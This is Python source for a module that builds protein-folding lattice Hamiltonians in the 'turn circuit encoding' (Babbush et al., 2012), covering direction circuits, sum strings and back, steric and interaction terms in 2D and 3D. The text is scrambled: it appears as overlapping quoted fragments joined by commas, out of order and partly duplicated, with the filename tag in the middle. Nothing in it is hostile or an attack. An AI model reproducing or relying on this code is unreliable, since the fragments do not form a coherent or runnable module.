[self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in", "on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\", "self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'z+': sum_string =", "maximum+1)])) def interaction_term_ij(self, i, j): return -1 * self.int_mat[i, j] * (self.a_x(i, j)", "self.get(self.pointer(i)+2)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1),", "r in range(maximum)] + \\ [qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(maximum)] ) def", "q_k): \"\"\"Implements a circuit that returns 1 if the chain moves in the", "[self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k == 'y+': sum_string =", "t in range(i, j)] elif k == 'z+': sum_string = [self.circuit_zp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2))", "def overlap(self, i, j): \"\"\"Computes the overlap term for residues i and j.\"\"\"", "al., 2012.\"\"\" self._proc_input(pepstring) self.ss_fmat = ss_fmat self.n_bits = self.dim * (self.naas-1) self._sum_strings =", "'y-': self.sum_string(i, j, 'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else", "j in range(1, math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j] == 0: continue expr += interaction_term_ij(i,", "TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian): is_2D = True @property def dim(self): return 2 def pointer(self, i): \"\"\"Points", "j, 'z-'), } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in 
range(maximum)] + \\", "= list(reversed(sum_string)) for t in chain(range(n_layers), reversed(range(n_layers-1))): if t % 2 == 0:", "for i in range(self.naas-2)]) def overlap(self, i, j): \"\"\"Computes the overlap term for", "i, j): return -1 * self.int_mat[i, j] * (self.a_x(i, j) + \\ self.a_y(i,", "encoding(self): return 'turn_circuit' def build_exp(self): self.expr = (self.naas+1) * self.back_term() if self.dim ==", "q_i*(1-q_j) def circuit_yp(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if the", "from itertools import chain from functools import reduce from .qlogic import * from", "return 0 prefactor = qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)]) return prefactor", "of a protein hamiltonian of the \"turn circuit encoding\" form, described by Babbush", "self._sum_strings[(i, j, k)] = [sp.expand(sum_string[x]) for x in range(maximum)] return self._sum_strings[(i, j, k)]", "p+1)]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(p+1, maximum+1)]) for p", "for j in range(i+1, self.naas)]) for i in range(self.naas)]) def a_x(self, i, j):", "% k][r]) for r in range(maximum)]) for k in ['x', 'y']]) return prefactor", "dict() self._create_bitreg() @property def encoding(self): return 'turn_circuit' def build_exp(self): self.expr = (self.naas+1) *", "r in range(maximum)]) return prefactor *\\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r],", "the direction y-.\"\"\" return q_i * q_j * (1-q_k) def circuit_zp(self, q_i, q_j,", "range(self.naas-1)]) def back_term(self): \"\"\"Ensures that the chain does not go back on itself.\"\"\"", "= [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k == 'x-': sum_string", "that returns 1 if the chain moves in the direction y-.\"\"\" return q_i", "self.sum_string(i, j, 'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-') } return", "the nonsensical 
string 000.\"\"\" return (1-q_i) * q_j * q_k def sum_string(self, i,", "in range(maximum)]) for k in ['x', 'z']]) return prefactor * \\ ( qxor(sumstring['y+'][0],", "* (1-q_k) def circuit_zp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1", "self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) *", "overlap term for residues i and j.\"\"\" maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=", "penalises meaningless residue bitstrings 000 and 011.\"\"\" return sum([ self.circuit_000(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) +", "range(maximum)]) for k in ['y', 'z']]) return prefactor * \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0])", "\"\"\"Points to the start of the string describing the ith turn.\"\"\" return 2*i", "in range(1, math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j] == 0: continue expr += interaction_term_ij(i, 1+i+2*j)", "bitstrings 000 and 011.\"\"\" return sum([ self.circuit_000(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) + \\ self.circuit_011(self.get(self.pointer(k)), self.get(self.pointer(k)+1),", "[self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'y+': sum_string", "self.get(self.pointer(i)+1)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\", "'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if", "the chain moves in the direction x-.\"\"\" 
return q_i*(1-q_j) def circuit_yp(self, q_i, q_j):", "self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) *", "sum_string[h] = a sum_string[h+1] = b maximum = int(math.ceil(math.log2(j-i))) sum_string = list(reversed(sum_string)) self._sum_strings[(i,", "def circuit_xn(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if the chain", "j in range(1, math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j] == 0: continue expr += self.interaction_term_ij(i,", "* \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ * qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in", "moves in the direction x+.\"\"\" return (1-q_i)*q_j def circuit_xn(self, q_i, q_j): \"\"\"Implements a", "['y', 'z']]) return prefactor * \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ * qand([ qxnor(sumstring['x+'][r],", "maximum)]) \\ + sum([ qxor(sumstring['x+'][p-2], sumstring['x+'][p-1]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x+'][r]) for r", "circuit_yp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if the chain", "range(maximum)] + \\ [qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(maximum)] ) def steric_term(self): \"\"\"Ensures", "for residues i and j.\"\"\" maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else", "in range(maximum)] ) def steric_term(self): \"\"\"Ensures that the chain does not overlap.\"\"\" return", "the start of the string describing the ith turn.\"\"\" return 2*i def circuit_xp(self,", "= [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k == 'y+': sum_string", "\"\"\"Implements a circuit that checks the nonsensical string 000.\"\"\" return (1-q_i) * (1-q_j)", "% 2 != 0 or maximum < 2: 
return sp.numbers.Integer(0) sumstring = {", "[1] for h in iterator: if self.ss_fmat == 'babej': if counter[h] > math.log2(j-i):", "range(2, maximum+1)])) def a_z(self, i, j): sumstring = { 'x+': self.sum_string(i, j, 'x+'),", "range(i, j)] elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in", "direction x+.\"\"\" return (1-q_i)*q_j def circuit_xn(self, q_i, q_j): \"\"\"Implements a circuit that returns", "-1 * self.int_mat[i, j] * (self.a_x(i, j) + \\ self.a_y(i, j)) def interaction_term(self):", "sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k == 'y-':", "self.sum_string(i, j, 'y-'), 'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-') } maximum", "go back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\", "* self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) for i in range(self.naas-2)]) def overlap(self, i, j): \"\"\"Computes the", "def circuit_zp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if the", "x in range(maximum)] return self._sum_strings[(i, j, k)] def back_term(self): \"\"\"Ensures that the chain", "return self._sum_strings[(i, j, k)] if k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2))", "return (1-q_i)*(1-q_j) def sum_string(self, i, j, k): \"\"\"Computes the sum string.\"\"\" if i", "(1-q_i) * (1-q_j) * (1-q_k) def circuit_011(self, q_i, q_j, q_k): \"\"\"Implements a circuit", "2: return sp.numbers.Integer(0) sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i, j,", "[self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'z+': sum_string", "{ 'x+': 
self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i, j, 'x-'), 'y+': self.sum_string(i, j, 'y+'),", "return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)] + \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for", "= b maximum = int(math.ceil(math.log2(j-i))) sum_string = list(reversed(sum_string)) self._sum_strings[(i, j, k)] = [sp.expand(sum_string[x])", "= [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] else: raise ValueError('k was {:s}'.format(k))", "ith turn.\"\"\" return 3*i def circuit_xp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that", "x+.\"\"\" return q_i * q_j * q_k def circuit_xn(self, q_i, q_j, q_k): \"\"\"Implements", "int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0 if maximum == 0: return 0 prefactor", "qxor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for", "is_3D = True @property def dim(self): return 3 def pointer(self, i): \"\"\"Points to", "2*i def circuit_xp(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if the", "r in range(maximum)] ) def steric_term(self): \"\"\"Ensures that the chain does not overlap.\"\"\"", "in range(1, p-1)]) \\ * qand([ qxor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(1, p+1)])", "in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def a_z(self, i, j): sumstring", "'y+'), 'y-': self.sum_string(i, j, 'y-'), 'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-'),", "= sp.numbers.Integer(0) for i in range(self.naas-3): for j in range(1, math.ceil((self.naas-i-1)/2)): if self.int_mat[i,", "0 else [0] else: iterator = range(1, t+1, 2) if t > 1", "def circuit_yp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if the", "prefactor * \\ ( qxor(sumstring['z+'][0], sumstring['z-'][0]) \\ * qand([ qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r", "== 'y+': sum_string = 
[self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k", "in range(i, j)] elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for", "self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-'), 'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i,", "half_adder(self, q_i, q_j): \"\"\"Applies a half-adder.\"\"\" return qand([q_i, q_j]), qxor(q_i, q_j) @property @abstractmethod", "q_i*q_j def circuit_yn(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if the", "p in range(2, maximum+1)])) def interaction_term_ij(self, i, j): return -1 * self.int_mat[i, j]", "range(i, j)] elif k == 'z+': sum_string = [self.circuit_zp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t", "prefactor * \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ * qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r", "if i-j !=0 else 0 if maximum == 0: return 0 prefactor =", "'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k", "self.expr += self.interaction_term() #self.expr = se.expand(self.expr) self.n_terms = len(self.expr.args) def get(self, k): \"\"\"Access", "* from proteinham.core.hamiltonian import Hamiltonian class CommonTurnCircuitHamiltonian(Hamiltonian): is_TurnCircuit = True def __init__(self, pepstring,", "<filename>proteinham/lattice/turn_circuit.py import math import numpy as np import sympy as sp import symengine", "self.n_bits = self.dim * (self.naas-1) self._sum_strings = dict() self._create_bitreg() @property def encoding(self): return", "k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif", "in range(maximum)]) return prefactor * \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ * qand([ qxnor(sumstring['x+'][r],", 
"for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in", "range(i, j)] elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in", "not go back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) +", "for r in range(maximum)]) for k in ['x', 'z']]) return prefactor * \\", "Babbush et al., 2012.\"\"\" self._proc_input(pepstring) self.ss_fmat = ss_fmat self.n_bits = self.dim * (self.naas-1)", "a protein hamiltonian of the \"turn circuit encoding\" form, described by Babbush et", "j)] elif k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in", "0 if maximum == 0: return 0 prefactor = qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for", "+ \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] + \\ [qxnor(sumstring['z+'][r], sumstring['z-'][r]) for", "i-j != 0 else 0 if maximum == 0: return 0 prefactor =", "* qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['x+'][p-2],", "t in chain(range(n_layers), reversed(range(n_layers-1))): if t % 2 == 0: iterator = range(0,", "from copy import deepcopy from itertools import chain from functools import reduce from", "range(maximum)]) for k in ['x', 'y']]) return prefactor * \\ ( qxor(sumstring['z+'][0], sumstring['z-'][0])", "def circuit_000(self, q_i, q_j, q_k): \"\"\"Implements a circuit that checks the nonsensical string", "self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) + \\ self.circuit_011(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) for k in range(self.naas-1)]) def back_term(self):", "k)] if k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), 
self.get(self.pointer(t)+2)) for t in", "q_i, q_j, q_k): \"\"\"Implements a circuit that checks the nonsensical string 000.\"\"\" return", "if the chain moves in the direction x-.\"\"\" return q_i * (1-q_j) *", "sum_string = [self.circuit_zn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] else: raise ValueError('k", "protein hamiltonian of the \"turn circuit encoding\" form, described by Babbush et al.,", "self.get(self.pointer(t)+2)) for t in range(i, j)] else: raise ValueError('k was {:s}'.format(k)) n_layers =", "return 0 prefactor = qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)]) return prefactor", "def circuit_xp(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if the chain", "range(1, maximum)]) \\ + sum([ qxor(sumstring['z+'][p-2], sumstring['z+'][p-1]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z+'][r]) for", "is_2D = True @property def dim(self): return 2 def pointer(self, i): \"\"\"Points to", "'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k ==", "['x', 'y']]) return prefactor * \\ ( qxor(sumstring['z+'][0], sumstring['z-'][0]) \\ * qand([ qxnor(sumstring['z+'][r],", "= self.dim * (self.naas-1) self._sum_strings = dict() self._create_bitreg() @property def encoding(self): return 'turn_circuit'", "* self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2))", "== 0: return 0 prefactor = qand([ qand([ qxnor(sumstring['%s+' % k][r], sumstring['%s-' %", "pass class TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian): is_2D = True @property def dim(self): return 2 def pointer(self,", "the direction x-.\"\"\" return q_i * 
(1-q_j) * (1-q_k) def circuit_yp(self, q_i, q_j,", "if the chain moves in the direction y+.\"\"\" return q_i*q_j def circuit_yn(self, q_i,", "qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)] + \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r", "__init__(self, pepstring, ss_fmat='babej'): \"\"\"Encapsulates the expression and methods of a protein hamiltonian of", "start of the string describing the ith turn.\"\"\" return 2*i def circuit_xp(self, q_i,", "qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(1, maximum)]) \\", "itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_xn(self.get(self.pointer(i)),", "[sp.expand(sum_string[x]) for x in range(maximum)] return self._sum_strings[(i, j, k)] def back_term(self): \"\"\"Ensures that", "in range(maximum)] + \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] ) def steric_term(self):", "qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['x+'][p-2], sumstring['x+'][p-1]) \\", "self.get(self.pointer(i+1)+1)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) *", "maximum)]) \\ + sum([ qxor(sumstring['z+'][p-2], sumstring['z+'][p-1]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z+'][r]) for r", "000 and 011.\"\"\" return sum([ self.circuit_000(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) + \\ self.circuit_011(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2))", "self.get(self.pointer(t)+1), 
self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'x-': sum_string =", "'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-') } return qand( [qxnor(sumstring['x+'][r],", "011.\"\"\" return sum([ self.circuit_000(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) + \\ self.circuit_011(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) for k", "% k][r]) for r in range(maximum)]) for k in ['x', 'z']]) return prefactor", "back_term(self): \"\"\"Ensures that the chain does not go back on itself.\"\"\" return sum([", "circuit that checks the nonsensical string 000.\"\"\" return (1-q_i) * q_j * q_k", "'z+'), 'z-': self.sum_string(i, j, 'z-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else", "= int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0 if maximum == 0: return 0", "hamiltonian.\"\"\" return self.bit_list[k] def half_adder(self, q_i, q_j): \"\"\"Applies a half-adder.\"\"\" return qand([q_i, q_j]),", "self._create_bitreg() @property def encoding(self): return 'turn_circuit' def build_exp(self): self.expr = (self.naas+1) * self.back_term()", "range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def a_y(self, i, j): sumstring =", "= [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'x-':", "chain moves in the direction y-.\"\"\" return (1-q_i)*(1-q_j) def sum_string(self, i, j, k):", "in range(self.naas-3): for j in range(1, math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j] == 0: continue", "% k][r], sumstring['%s-' % k][r]) for r in range(maximum)]) for k in ['y',", "self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * 
self.circuit_zp(self.get(self.pointer(i+1)),", "range(i, j)] elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t", "range(self.naas-3): for j in range(1, math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j] == 0: continue expr", "describing the ith turn.\"\"\" return 3*i def circuit_xp(self, q_i, q_j, q_k): \"\"\"Implements a", "in range(i, j)] elif k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t", "(self.a_x(i, j) + \\ self.a_y(i, j)) def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\" expr", "i and j.\"\"\" maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0 if", "!= 0 or maximum < 2: return sp.numbers.Integer(0) sumstring = { 'x+': self.sum_string(i,", "if t % 2 == 0: iterator = range(0, t+1, 2) if t", "in range(maximum)] return self._sum_strings[(i, j, k)] def back_term(self): \"\"\"Ensures that the chain does", "range(maximum)] return self._sum_strings[(i, j, k)] def redun_term(self): \"\"\"Implements the term that penalises meaningless", "for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in", "q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if the chain moves", "start of the string describing the ith turn.\"\"\" return 3*i def circuit_xp(self, q_i,", "self._sum_strings.keys(): return self._sum_strings[(i, j, k)] if k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1))", "self.get(self.pointer(i)+1)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\", "return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xn(self.get(self.pointer(i+1)), 
self.get(self.pointer(i+1)+1)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xp(self.get(self.pointer(i+1)),", "return expr class TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian): is_3D = True @property def dim(self): return 3 def", "circuit_xn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if the chain", "self._proc_input(pepstring) self.ss_fmat = ss_fmat self.n_bits = self.dim * (self.naas-1) self._sum_strings = dict() self._create_bitreg()", "else: iterator = range(1, t+1, 2) if t > 1 else [1] for", "maximum+1)])) def interaction_term_ij(self, i, j): return -1* self.int_mat[i, j] * (self.a_x(i, j) +", "r in range(1, maximum)]) \\ + sum([ qxor(sumstring['x+'][p-2], sumstring['x+'][p-1]) \\ * qand([ qxnor(sumstring['x+'][r-1],", "chain moves in the direction x-.\"\"\" return q_i*(1-q_j) def circuit_yp(self, q_i, q_j): \"\"\"Implements", "j)] elif k == 'z-': sum_string = [self.circuit_zn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in", "[self.circuit_zp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'z-': sum_string", "maximum+1)]) for p in range(2, maximum+1)])) def interaction_term_ij(self, i, j): return -1* self.int_mat[i,", "* q_j * (1-q_k) def circuit_zp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that", "self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yp(self.get(self.pointer(i+1)),", "1 else [1] for h in iterator: if self.ss_fmat == 'babej': if counter[h]", "= int(math.ceil(math.log2(j-i))) sum_string = list(reversed(sum_string)) self._sum_strings[(i, j, k)] = [sp.expand(sum_string[x]) for x in", "that checks the nonsensical string 
000.\"\"\" return (1-q_i) * (1-q_j) * (1-q_k) def", "j) + \\ self.a_z(i, j)) def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\" expr =", "sum string.\"\"\" if i > j: raise ValueError(\"i > j\") if (i, j,", "for t in range(i, j)] elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1),", "range(0, t+1, 2) if t > 0 else [0] else: iterator = range(1,", "return self.bit_list[k] def half_adder(self, q_i, q_j): \"\"\"Applies a half-adder.\"\"\" return qand([q_i, q_j]), qxor(q_i,", "the direction y-.\"\"\" return (1-q_i)*(1-q_j) def sum_string(self, i, j, k): \"\"\"Computes the sum", "direction y-.\"\"\" return (1-q_i)*(1-q_j) def sum_string(self, i, j, k): \"\"\"Computes the sum string.\"\"\"", "residues i and j.\"\"\" maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0", "if self.ss_fmat == 'babej': if counter[h] > math.log2(j-i): continue else: counter[h] += 1", "* q_k def circuit_zn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1", "return (1-q_i) * (1-q_j) * q_k def circuit_zn(self, q_i, q_j, q_k): \"\"\"Implements a", "= range(0, t+1, 2) if t > 0 else [0] else: iterator =", "if self.dim == 3: self.expr += (self.naas+1)**2 * self.redun_term() self.expr += (self.naas+1) *", "range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def interaction_term_ij(self, i, j): return -1*", "+= self.interaction_term() #self.expr = se.expand(self.expr) self.n_terms = len(self.expr.args) def get(self, k): \"\"\"Access the", "self.circuit_zp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) for i in range(self.naas-2)]) def overlap(self, i, j): \"\"\"Computes the", "r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(p+1,", "j) + \\ self.a_y(i, j)) def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\" expr =", "+ \\ self.a_y(i, j)) def interaction_term(self): \"\"\"Computes 
contacts between residues.\"\"\" expr = sp.numbers.Integer(0)", "> 0 else [0] else: iterator = range(1, t+1, 2) if t >", "return 0 prefactor = qand([ qand([ qxnor(sumstring['%s+' % k][r], sumstring['%s-' % k][r]) for", "self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'y+': sum_string =", "j: raise ValueError(\"i > j\") if (i, j, k) in self._sum_strings.keys(): return self._sum_strings[(i,", "itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) *", "self.circuit_zn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * 